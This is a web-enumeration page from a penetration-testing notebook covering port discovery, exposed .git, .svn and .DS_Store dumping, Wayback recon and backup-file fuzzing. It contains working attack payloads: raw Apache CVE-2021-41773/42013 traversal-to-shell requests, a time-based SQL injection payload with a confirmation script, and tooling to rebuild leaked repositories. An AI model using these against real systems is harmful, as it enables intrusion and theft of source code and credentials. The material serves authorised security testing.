# Web Enumeration

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Recon

{% hint style="success" %}
*Also check for other exposed ports. Ex: 22, look for regreSSHion (CVE-2024-6387), etc. See* [*Protocols*](/0xss0rz/pentest/protocols.md)
{% endhint %}

```
nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list
```
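The `-oA` run above also writes `web_discovery.xml`; the script below (an added example, not part of the original notes) turns that XML into `http(s)://host:port` targets for EyeWitness, Aquatone or httpx. It uses the layout nmap itself writes; the sample document embedded in it is constructed for the demo, and the "https when `tunnel="ssl"` or a usual TLS port" rule is an assumption you may want to widen.

```python
"""nmap -oX / -oA output -> web target list (added example; sample XML is constructed)."""
import xml.etree.ElementTree as ET

# Ports treated as TLS even when nmap did not set tunnel="ssl" (assumption).
TLS_PORTS = {443, 8443, 4443}

# Constructed sample of what nmap -oX writes; not real scan data.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="web.example.internal" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="http" tunnel="ssl"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="8180"><state state="open"/><service name="http"/></port>
    </ports>
  </host>
</nmaprun>
"""

def web_targets(xml_text, prefer_hostname=True):
    """Sorted, de-duplicated URLs for every open TCP port of every host that is up.
    Scheme is https when nmap saw TLS (tunnel="ssl") or the port is in TLS_PORTS."""
    root = ET.fromstring(xml_text)
    urls = set()
    for host in root.iter("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address[@addrtype='ipv6']")
        if addr_el is None:
            continue
        name = addr_el.get("addr")
        if addr_el.get("addrtype") == "ipv6":
            name = f"[{name}]"          # URL literal form for v6
        hn = host.find("hostnames/hostname")
        if prefer_hostname and hn is not None and hn.get("name"):
            name = hn.get("name")
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("protocol") != "tcp" or state is None or state.get("state") != "open":
                continue
            portid = int(port.get("portid"))
            svc = port.find("service")
            tls = (svc is not None and svc.get("tunnel") == "ssl") or portid in TLS_PORTS
            scheme = "https" if tls else "http"
            default = 443 if tls else 80
            suffix = "" if portid == default else f":{portid}"
            urls.add(f"{scheme}://{name}{suffix}")
    return sorted(urls)

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    print("\n".join(web_targets(text)))
```

Run it as `python3 nmap2urls.py web_discovery.xml > targets.txt` and feed `targets.txt` to the screenshot tool; pass `prefer_hostname=False` if the PTR names nmap resolved do not route through the same virtual host as the IP.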

{% embed url="<https://github.com/scmanjarrez/CVEScannerV2>" %}

{% embed url="<https://github.com/vulnersCom/nmap-vulners>" %}

Leverage Shodan to find known CVEs for the discovered services

{% embed url="<https://github.com/iamunixtz/Lazy-Hunter/tree/main>" %}

EyeWitness or Aquatone - **See** [**Information Gathering**](/0xss0rz/pentest/recon/information-gathering.md)

{% content-ref url="/pages/eRYeocv9Hb1m8yTiGavV" %}
[Fingerprinting / Crawling](/0xss0rz/pentest/recon/fingerprinting-crawling.md)
{% endcontent-ref %}

{% embed url="<https://github.com/blackhatethicalhacking/SecretOpt1c?s=03>" %}

{% embed url="<https://github.com/chm0dx/creepyCrawler>" %}

## SSL / TLS

{% embed url="<https://github.com/testssl/testssl.sh>" %}

{% embed url="<https://github.com/projectdiscovery/tlsx>" %}

## HTTP/2 - DoS

Basic vulnerability scan for HTTP/2 Rapid Reset (CVE-2023-44487): a server that lets a client open streams and immediately cancel them with `RST_STREAM` without limit can be exhausted with very little bandwidth.

{% embed url="<https://github.com/bcdannyboy/CVE-2023-44487>" %}

## HTTP Downgrading

HTTP downgrading is forcing a request to be processed as HTTP/1.1 instead of HTTP/2. It matters because a front end that takes HTTP/2 from the client but speaks HTTP/1.1 to its back end has to rewrite the request, and that rewrite is where the H2.CL / H2.TE request smuggling variants live.

1. Open Burp Suite and navigate to Proxy → HTTP History
2. Locate a request that is currently using HTTP/2.
3. Send the request to Repeater
4. In the Repeater tab, open the "Inspector" panel → Request Attributes → Protocol
5. Change the HTTP version to HTTP/1.1
6. Click "Send" in Repeater.

If successful, you should receive a valid response, confirming the server also accepts HTTP/1.1.

Now, test for request smuggling

{% content-ref url="/pages/V1hfs9zunJ3waXeibqj7" %}
[HTTP Request Smuggling](/0xss0rz/pentest/web-attacks/http-request-smuggling.md)
{% endcontent-ref %}

## HTTP Methods

{% embed url="<https://github.com/ShutdownRepo/httpmethods>" %}

{% content-ref url="/pages/FdfHddWyfvIlPnhkmKMn" %}
[HTTP Verb Tampering](/0xss0rz/pentest/web-attacks/http-verb-tampering.md)
{% endcontent-ref %}

## Apache Vulnerability Testing

{% embed url="<https://github.com/mrmtwoj/apache-vulnerability-testing>" %}

{% embed url="<https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898>" %}

{% embed url="<https://github.com/soltanali0/CVE-2024-40725>" %}

* CVE-2021-41773 (Apache 2.4.49 only): path traversal, giving LFI when the target directory is not protected by `Require all denied`, and RCE when `mod_cgi` is enabled

```
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id
```

* CVE-2021-42013 (Apache 2.4.49 and 2.4.50): the 2.4.50 fix for CVE-2021-41773 was incomplete, so a double URL-encoded traversal (`%%32%65` → `%2e` → `.`) still gets through; same LFI/RCE consequences

```
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id
```
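Why the second CVE exists: the 2.4.50 patch decoded the path once, so a traversal encoded twice survives one decoding pass as `%2e%2e` and only becomes `../` on the second. The block below is an added example, not part of the original notes; it uses `urllib`'s `unquote` to reproduce the one-pass and two-pass decoding (Apache's own normaliser differs in its internals, but the outcome on these two payloads is the same), builds the LFI variant of both probes (reading `/etc/passwd` rather than executing `/bin/sh`), and `vulnerable()` is a hypothetical helper that classifies a captured response.

```python
"""Single vs double URL-encoding behind CVE-2021-41773 / CVE-2021-42013 (added example)."""
from urllib.parse import unquote

SINGLE = ".%2e/"            # "../" after one decoding pass   (2.4.49)
DOUBLE = "%%32%65%%32%65/"  # "%2e%2e/" after one pass, "../" after two (2.4.50)

def decode_once(path):
    return unquote(path)

def decode_twice(path):
    return unquote(unquote(path))

def probe_path(variant, target="etc/passwd", depth=4, prefix="/cgi-bin/"):
    """Traversal path for the 2.4.49 ('single') or 2.4.50 ('double') encoding.
    The request must go through a mapped directory such as /cgi-bin/; four
    levels is enough in a default layout and extra ../ past / are harmless."""
    seg = {"single": SINGLE, "double": DOUBLE}[variant]
    return prefix + seg * depth + target

def vulnerable(status, body):
    """Hypothetical classifier for the LFI probe: a 200 whose body looks like
    /etc/passwd means the traversal was not normalised away."""
    return status == 200 and "root:x:0:0:" in body

if __name__ == "__main__":
    for v in ("single", "double"):
        p = probe_path(v)
        print(f"{v:6} {p}\n       one pass : {decode_once(p)}\n       two pass : {decode_twice(p)}")
```

Send `GET <probe_path(...)> HTTP/1.1` to the target (curl with `--path-as-is`, otherwise the client normalises the `..` away before Apache sees them) and run the response through `vulnerable()`; the `double` variant succeeding on a server that rejects `single` is the fingerprint of 2.4.50.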

{% embed url="<https://github.com/trilokdhaked/Bug-Bounty-Methodology/blob/main/Technologies/Apache%20HTTP%20Server.md>" %}

## Scan for credz

{% embed url="<https://github.com/m14r41/scan4secrets>" %}

## Header Exploit

{% embed url="<https://github.com/c0dejump/HExHTTP?tab=readme-ov-file>" %}

## Common files

{% embed url="<https://github.com/Bo0oM/fuzz.txt>" %}

```
.git
.gitkeep
.git-rewrite
.gitreview
.git/HEAD
.gitconfig
.git/index
.git/logs
.svnignore
.gitattributes
.gitmodules
.svn/entries
.DS_Store
.env
debug.log
backup/
admin.bak
database.sql
composer.lock
```

`robots.txt`

-> robofinder: search for and retrieve historical `robots.txt` files from Archive.org for any given website.

{% embed url="<https://github.com/Spix0r/robofinder>" %}

`.git`

`.svn`

`.DS_Store`

`.env`

<figure><img src="/files/lwPLR92jGzGU3hgueKgA" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/lijiejie/ds_store_exp>" %}

```
# python ds_store_exp.py http://10.13.X.X/.DS_Store   
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->
```
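What `ds_store_exp` is doing under the hood: a `.DS_Store` is Finder's per-folder database, and every record in it starts with a big-endian UTF-16 name length, the name, a 4-byte record id (`Iloc`, `bwsp`, `cmmt`, ...) and a 4-byte value type (`long`, `shor`, `bool`, `blob`, `type`, `ustr`, `comp`, `dutc`). Scanning for that shape recovers the directory entries without walking the B-tree, which is all you need to request `<name>/` and `<name>/.DS_Store` next. The block below is an added example, not from the original notes or from `ds_store_exp`; the sample bytes are constructed with the same record layout and are not a real file.

```python
"""Heuristic .DS_Store name extractor + next-hop URL builder (added example; sample is constructed)."""
import struct

RECORD_TYPES = {b"long", b"shor", b"bool", b"blob", b"type", b"ustr", b"comp", b"dutc"}

def ds_store_names(data):
    """Unique entry names found in a .DS_Store blob, in file order."""
    names, seen, i, n = [], set(), 0, len(data)
    while i + 4 <= n:
        length = struct.unpack(">I", data[i:i + 4])[0]      # name length in UTF-16 units
        end = i + 4 + 2 * length
        if 1 <= length <= 255 and end + 8 <= n and data[end + 4:end + 8] in RECORD_TYPES:
            try:
                name = data[i + 4:end].decode("utf-16-be")
            except UnicodeDecodeError:
                name = None
            if name and name.isprintable() and "/" not in name:
                if name not in seen:
                    seen.add(name)
                    names.append(name)
                i = end + 8                                   # skip id + type, continue at value
                continue
        i += 1
    return names

def child_urls(base, names):
    """URLs to request next, mirroring the recursive dump shown above."""
    base = base.rstrip("/")
    out = []
    for name in names:
        if name == ".DS_Store":
            continue
        out.append(f"{base}/{name}/")
        out.append(f"{base}/{name}/.DS_Store")
    return out

def _record(name, rid, rtype, value):
    """One record in the on-disk layout; only used to build the sample."""
    enc = name.encode("utf-16-be")
    return struct.pack(">I", len(enc) // 2) + enc + rid + rtype + value

# Constructed sample: 'Bud1' header, two folders with window-position (Iloc,
# blob) records, a file with an empty comment (cmmt, ustr), and junk bytes
# between records to show the scanner skips them.
SAMPLE = (b"\x00\x00\x00\x01Bud1" + b"\x00" * 16
          + _record("JS", b"Iloc", b"blob", struct.pack(">I", 16) + b"\x00" * 16)
          + b"\xff\xfe\x12"
          + _record("dev", b"Iloc", b"blob", struct.pack(">I", 16) + b"\x00" * 16)
          + _record("backup.sql", b"cmmt", b"ustr", struct.pack(">I", 0))
          + b"\x00" * 8)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for url in child_urls("http://10.13.X.X/", ds_store_names(blob)):
        print(url)
```

A name that is not a directory still shows up (`backup.sql` above), which is exactly the point: the file listing leaks even when the directory itself returns 403. For an exact parse of an odd file, use a real B-tree parser (the `ds_store` Python package); the heuristic is enough for enumeration.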

{% embed url="<https://buildthis.com/ds_store-files-and-why-you-should-know-about-them/>" %}

{% embed url="<https://hackernoon.com/what-happened-after-i-scanned-26-million-domains-for-exposed-ds_store-files>" %}

{% embed url="<https://cyberant.com/en/the-risk-of-ds_store/>" %}

## Cloudflare&#x20;

### Real IP address

Tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.

{% embed url="<https://github.com/musana/CF-Hero>" %}

### Internal IP leakage

`/cdn-cgi/trace` on live hosts: Cloudflare's diagnostic endpoint echoes the connecting address (`ip=`), the edge location (`colo=`) and the negotiated protocol/TLS version. Make the target fetch it for you (SSRF, webhooks, link previews) and the `ip=` line reveals that component's real egress IP.

## sitemap.xml

Time-based SQL injection in a `sitemap.xml` parameter: sleep payload `[1;SELECT IF((8303>8302),SLEEP(9),2356)#]` => response takes about 9s. Send the `#` URL-encoded as `%23`, otherwise the client treats it as a fragment and the comment terminator never reaches the server; repeat with a false condition (`8303<8302`) to rule out a server that is just slow.

```
target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)# 
```
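Confirming the delay properly means three measurements, not one: baseline, true condition, false condition. Only the true one should be slower by the sleep value; a slow server slows all three. The block below is an added example, not from the original notes; `urlencode()` takes care of sending `#` as `%23`, and the local mock server is constructed for the demo (it sleeps only when a true-condition `IF(...,SLEEP(n),...)` reaches it, standing in for MySQL), so the check runs offline.

```python
"""Time-based SQLi confirmation with baseline/true/false timing (added example; mock server is constructed)."""
import http.server
import re
import threading
import time
import urllib.parse
import urllib.request

DELAY = 1.0  # seconds for the demo; the note above uses 9 against a real target
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env vars

def payload(value, condition, delay=DELAY):
    """The stacked payload from the note, parameterised on the condition."""
    return f"{value};SELECT IF(({condition}),SLEEP({int(delay)}),2356)#"

def timed_get(url, params):
    """GET url?params and return elapsed seconds. urlencode() emits %23 for '#',
    so the comment terminator is sent instead of being dropped as a fragment."""
    start = time.monotonic()
    with _OPENER.open(f"{url}?{urllib.parse.urlencode(params)}", timeout=DELAY * 5) as resp:
        resp.read()
    return time.monotonic() - start

def is_time_based_injectable(url, param, value="1", delay=DELAY):
    """True only when the true-condition request is slower by ~delay and the
    false-condition one is not."""
    baseline = timed_get(url, {param: value})
    t_true = timed_get(url, {param: payload(value, "8303>8302", delay)})
    t_false = timed_get(url, {param: payload(value, "8303<8302", delay)})
    return t_true - baseline >= delay * 0.8 and t_false - baseline < delay * 0.5

class _MockVuln(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a vulnerable sitemap.xml?offset= endpoint:
    evaluates IF(a<op>b, SLEEP(n), ...) the way MySQL would for these payloads."""
    def do_GET(self):
        q = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        off = q.get("offset", [""])[0]
        m = re.search(r"IF\(\((\d+)([<>])(\d+)\),SLEEP\((\d+)\)", off)
        if m and (int(m[1]) > int(m[3]) if m[2] == ">" else int(m[1]) < int(m[3])):
            time.sleep(int(m[4]))
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.end_headers()
        self.wfile.write(b"<urlset/>")
    def log_message(self, *args):  # keep the demo quiet
        pass

def start_mock():
    """Start the mock on an ephemeral port; returns (server, sitemap URL)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _MockVuln)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/sitemap.xml"

if __name__ == "__main__":
    srv, url = start_mock()
    print("injectable:", is_time_based_injectable(url, "offset"))
    srv.shutdown()
```

Against a real target call `is_time_based_injectable("https://target/sitemap.xml", "offset", delay=9)`; the two thresholds (80% of the delay for the positive case, under 50% for the negative) leave room for jitter without accepting a merely slow endpoint.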

{% content-ref url="/pages/Dh9r9uiMPAgYlFGxZE2L" %}
[SQL Injection](/0xss0rz/pentest/web-attacks/sql-injection.md)
{% endcontent-ref %}

## Misconfigurations on popular third-party services

{% embed url="<https://github.com/intigriti/misconfig-mapper>" %}

<figure><img src="/files/5dYi9R0NvV7vnDZWO6Gr" alt=""><figcaption></figcaption></figure>

{% embed url="<https://blog.intigriti.com/hacking-tools/exploring-third-party-services-for-open-signups-security-risks-and-best-practices>" %}

## Git Exposed

DotGit Extension - Firefox and Chrome <https://addons.mozilla.org/en-US/firefox/addon/dotgit/>

```
cat domains.txt | nuclei -t git-exposed.yaml
```

Nuclei Template: <https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml>

```yaml
id: git-exposed

info:
  name: Exposed Git Repository
  author: kaks3c
  severity: medium
  description: |
    Checks for exposed Git repositories by making requests to potential Git repository paths.
  tags: p3,logs,git

http:
  - raw:
      - |
        GET {{BaseURL}}{{path}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Connection: close

    attack: pitchfork
    payloads:
      path:
        - /.git/
        - /.git/HEAD
        - /.git/config
        - /.git/logs/HEAD
        - /.git/logs/
        - /.git/description
        - /.git/refs/heads/
        - /.git/refs/remotes/
        - /.git/objects/

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "commit (initial): Initial commit" #/.git/logs/HEAD
          - "ref: refs/heads/" #/.git/HEAD
          - "logallrefupdates = true" #/.git/config
          - "repositoryformatversion = 0" #/.git/config
          - "Index of /" #/.git/
          - "You do not have permission to access /.git/" #403_/.git
          - "Unnamed repository; edit this file 'description' to name the repository" #/.git/description

      - type: regex
        regex:
          - "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/
          - "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/
          - "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}"  #/.git/logs/

    stop-at-first-match: true
```

`.git` found => download the target `.git` folder. `wget -r` only works when the server returns directory listings for `.git/`; without listings, use one of the tools below, which fetch the known files (`HEAD`, `config`, `index`, `refs`, `logs`, `packed-refs`) and follow the object hashes they contain.

```
wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/
```

Or with tools:

{% hint style="info" %}
*The best tool is goop*
{% endhint %}

{% embed url="<https://github.com/nyancrimew/goop>" %}

```
$ git clone https://github.com/nyancrimew/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb  
```

{% embed url="<https://github.com/lijiejie/GitHack>" %}

{% embed url="<https://github.com/WangYihang/GitHacker>" %}

{% embed url="<https://github.com/Ebryx/GitDump>" %}
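What those tools read first is `.git/index`: it lists every tracked path with its blob SHA-1, so you know what the repo contains and which `objects/xx/yyyy...` to request before a single object is downloaded. The block below is an added example, not part of the original notes or of goop; it parses index versions 2 and 3 (12-byte `DIRC` header, then per entry 62 bytes of stat data + SHA-1 + flags, the NUL-terminated path, and padding to 8 bytes) and refuses v4, whose prefix-compressed paths would otherwise be misparsed. The sample index is built in memory with the same layout and is not from a real repository.

```python
"""Parse a dumped .git/index (v2/v3) into paths + blob SHA-1s (added example; sample is constructed)."""
import struct

HEADER = struct.Struct(">4sII")          # signature, version, entry count
ENTRY = struct.Struct(">10I20sH")        # ctime s/ns, mtime s/ns, dev, ino, mode, uid, gid, size, sha1, flags

def parse_index(data):
    """Return [(path, sha1_hex, mode)] for every entry."""
    sig, version, count = HEADER.unpack_from(data, 0)
    if sig != b"DIRC":
        raise ValueError("not a git index (bad signature)")
    if version not in (2, 3):
        raise ValueError(f"index v{version} not supported (v4 uses path compression)")
    entries, off = [], HEADER.size
    for _ in range(count):
        start = off
        fields = ENTRY.unpack_from(data, off)
        mode, sha1, flags = fields[6], fields[10], fields[11]
        off += ENTRY.size
        if flags & 0x4000:                       # v3: extended flags word follows
            off += 2
        name_len = flags & 0x0FFF
        if name_len < 0x0FFF:
            path = data[off:off + name_len]
            off += name_len
        else:                                    # name >= 4095 bytes: scan to the NUL
            end = data.index(b"\x00", off)
            path = data[off:end]
            off = end
        entries.append((path.decode("utf-8", "surrogateescape"), sha1.hex(), mode))
        # entry length (including at least one NUL) is rounded up to a multiple of 8
        off = start + ((off - start + 1 + 7) // 8) * 8
    return entries

def object_paths(entries):
    """Loose-object locations to request under .git/ for each blob."""
    return [f"objects/{sha[:2]}/{sha[2:]}" for _, sha, _ in entries]

def build_index(files):
    """Constructed v2 index writer for the demo; files = [(path, sha1_hex)]."""
    body = b""
    for path, sha in files:
        p = path.encode()
        entry = ENTRY.pack(0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0, bytes.fromhex(sha), len(p)) + p + b"\x00"
        body += entry + b"\x00" * ((8 - len(entry) % 8) % 8)
    return HEADER.pack(b"DIRC", 2, len(files)) + body

# Constructed sample: the two files an attacker would want to see first.
SAMPLE_FILES = [("config/database.php", "e69de29bb2d1d6434b8b29ae775ad8c2e48c5391"),
                (".env", "5ba93c9db0cff93f52b521d7420e43f6eda2784f")]

if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_index(SAMPLE_FILES)
    for path, sha, mode in parse_index(raw):
        print(f"{mode:06o} {sha} {path}")
```

Run `python3 gitindex.py dumped/.git/index`; blobs that come back 404 as loose objects live in a packfile, whose name is listed in `.git/objects/info/packs` or `.git/packed-refs`, which is the next thing the dumper tools fetch.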

After that, search for creds, vulnerabilities, etc:

{% content-ref url="/pages/prJN0YrAWHmLEt6Z1Wkv" %}
[Credentials in git repos](/0xss0rz/pentest/recon/osint/credentials-in-git-repos.md)
{% endcontent-ref %}

{% content-ref url="/pages/lFZao0RJ0EteX7edGc1w" %}
[GitHub - finding vulnerabilities](/0xss0rz/pentest/recon/osint/github-finding-vulnerabilities.md)
{% endcontent-ref %}

## SVN Exposed

{% embed url="<https://github.com/anantshri/svn-extractor>" %}

```
./svn-extractor.py --url http://url.com --match database.php
```
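For Subversion 1.7+ working copies the interesting file is `.svn/wc.db`, a SQLite database whose `NODES` table maps each path to a checksum of the form `$sha1$<hex>`; the full file content sits in `.svn/pristine/<hex[:2]>/<hex>.svn-base`, which the web server will serve even when the source file itself is blocked (older working copies use `.svn/entries` and `.svn/text-base/<file>.svn-base`). The block below is an added example, not from the original notes or from svn-extractor; the sample database is constructed in memory with only the `NODES` columns this uses.

```python
"""Map a leaked .svn/wc.db to pristine-file URLs (added example; sample DB is constructed)."""
import re
import sqlite3

CHECKSUM = re.compile(r"^\$sha1\$([0-9a-f]{40})$")

def open_wc_db(path):
    """Open a dumped wc.db read-only."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)

def pristine_targets(con, base_url, match=None):
    """[(relpath, pristine_url)] for every file node; `match` filters on a path
    substring like svn-extractor's --match."""
    base = base_url.rstrip("/")
    rows = con.execute(
        "SELECT local_relpath, checksum FROM NODES "
        "WHERE kind = 'file' AND checksum IS NOT NULL ORDER BY local_relpath"
    ).fetchall()
    out, seen = [], set()
    for relpath, checksum in rows:
        m = CHECKSUM.match(checksum)
        if not m or relpath in seen or (match and match not in relpath):
            continue
        seen.add(relpath)
        h = m.group(1)
        out.append((relpath, f"{base}/.svn/pristine/{h[:2]}/{h}.svn-base"))
    return out

def build_sample_db():
    """Constructed minimal wc.db: same NODES columns and checksum format."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, checksum TEXT)")
    con.executemany("INSERT INTO NODES VALUES (?,?,?)", [
        ("", "dir", None),
        ("config", "dir", None),
        ("config/database.php", "file", "$sha1$2fd4e1c67a2d28fced849ee1bb76e7391b93eb12"),
        ("index.php", "file", "$sha1$da39a3ee5e6b4b0d3255bfef95601890afd80709"),
    ])
    con.commit()
    return con

if __name__ == "__main__":
    import sys
    con = open_wc_db(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    only = sys.argv[2] if len(sys.argv) > 2 else None
    for relpath, url in pristine_targets(con, "http://url.com", match=only):
        print(relpath, "->", url)
```

Fetch `http://url.com/.svn/wc.db` first, run `python3 svnpristine.py wc.db database` and download the printed URLs; the real `NODES` table has one row per `op_depth`, which is why paths are de-duplicated.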

## PHPMyAdmin

`target[.]com/phpmyadmin/setup/index.php` ==> 301 to login page

`target[.]com/phpMyAdmin/setup/index.php` ==> 200 to phpmyadmin setup

## AdminDirectoryFinder

{% embed url="<https://github.com/tausifzaman/AdminDirectoryFinder>" %}

## WSAAR

{% embed url="<https://github.com/Nishacid/WSAAR>" %}

## OWASP Noir

{% embed url="<https://github.com/owasp-noir/noir>" %}

```
$ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan
```

## Grab All URLs

```shellscript
#!/bin/bash

# Ask for the location of scope.txt
read -p "Enter the path to the scope.txt file: " scope_file

# Check that the file exists
if [ ! -f "$scope_file" ]; then
    echo "Error: file '$scope_file' does not exist."
    exit 1
fi

# Build a copy with https:// prepended to each line
echo "Preparing the file with https://..."
sed 's|^|https://|' "$scope_file" > scope_https.txt

# Run waybackurls
echo "Running waybackurls..."
cat "$scope_file" | waybackurls > wayback.scope

# Run gau
echo "Running gau..."
cat "$scope_file" | gau > gau.txt

# Run katana
echo "Running katana..."
/home/thomas/Bureau/Tools/crawler/katana -list "$scope_file" -o katana.txt

# Run hakrawler
echo "Running hakrawler..."
cat scope_https.txt | hakrawler > hakrawler.txt

# Run cariddi
echo "Running cariddi..."
cat scope_https.txt | /home/thomas/Bureau/Tools/crawler/cariddi -ot cariddi.txt

mv output-cariddi/cariddi.txt.results.txt cariddi.txt

# Run urlfinder
echo "Running urlfinder..."
/home/thomas/Bureau/Tools/crawler/urlfinder -list "$scope_file" -o urlfinder.txt

echo "Done!"
echo "- waybackurls : wayback.scope"
echo "- gau : gau.txt"
echo "- katana : katana.txt"
echo "- hakrawler : hakrawler.txt"
echo "- cariddi : cariddi.txt"
echo "- urlfinder : urlfinder.txt"

# Merge all results and remove duplicates
echo ""
echo "Merging all results and removing duplicates..."
cat wayback.scope gau.txt katana.txt hakrawler.txt cariddi.txt urlfinder.txt | sort -u > urls_final.txt

echo "✓ Merge complete! Result in: urls_final.txt"
echo "Total unique URLs: $(wc -l < urls_final.txt)"

```

## URLScan.io

Check URLScan as a complement to Wayback Machine

{% content-ref url="/pages/ziUET1mKbgC3HbH4BP0f" %}
[Information Gathering](/0xss0rz/pentest/recon/information-gathering.md)
{% endcontent-ref %}

## Postman

<figure><img src="/files/21kgv80g0kKYStAFXVZV" alt=""><figcaption></figcaption></figure>

Search Postman for the domain name with Workspace type set to Public: publicly shared collections may contain internal endpoints and live API keys.

## WaybackLister

Reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose **directory listings**

{% embed url="<http://github.com/anmolksachan/wayBackLister>" %}

```
python waybacklister.py -d target.com
```

## Wayback Machine

{% embed url="<https://github.com/mhmdiaa/chronos>" %}

```
# RECON METHOD BY ~/.COFFINXP

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt

cat out.txt | uro |  grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
```

{% content-ref url="/pages/ziUET1mKbgC3HbH4BP0f" %}
[Information Gathering](/0xss0rz/pentest/recon/information-gathering.md)
{% endcontent-ref %}

{% embed url="<https://github.com/AnonKryptiQuz/TimeVault>" %}

{% embed url="<https://github.com/xnl-h4ck3r/waymore>" %}

```
waymore -i target.com -mode U -oU urls.txt
```

Download pages and extract JS (mode R)

```
waymore -i target.com -mode R --output-inline-js -ko "\.js$" -oR jsdump/*
```

{% embed url="<https://github.com/tomnomnom/waybackurls>" %}

{% embed url="<https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050>" %}

## JWTXposer

Scans public archives like the **Wayback Machine**, extracts leaked **JWT tokens**, and decodes them to identify potentially exploitable information.

{% embed url="<https://github.com/chaudharyarjun/JWTXposer>" %}

## Backup Files&#x20;

```
ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50  -fs 0 -c -x http://localip:8080
```

{% embed url="<https://github.com/coffinxp/payloads/blob/main/backup_files_only.txt>" %}

### Fuzzuli

{% embed url="<https://github.com/musana/fuzzuli>" %}

```
echo http://target.com | fuzzuli -p
```

### Burp Extension

{% embed url="<https://portswigger.net/bappstore/466bc6cbf5bb4449b56af7bd9c0000ea>" %}

## Archived Backups

{% embed url="<https://github.com/anmolksachan/WayBackupFinder>" %}

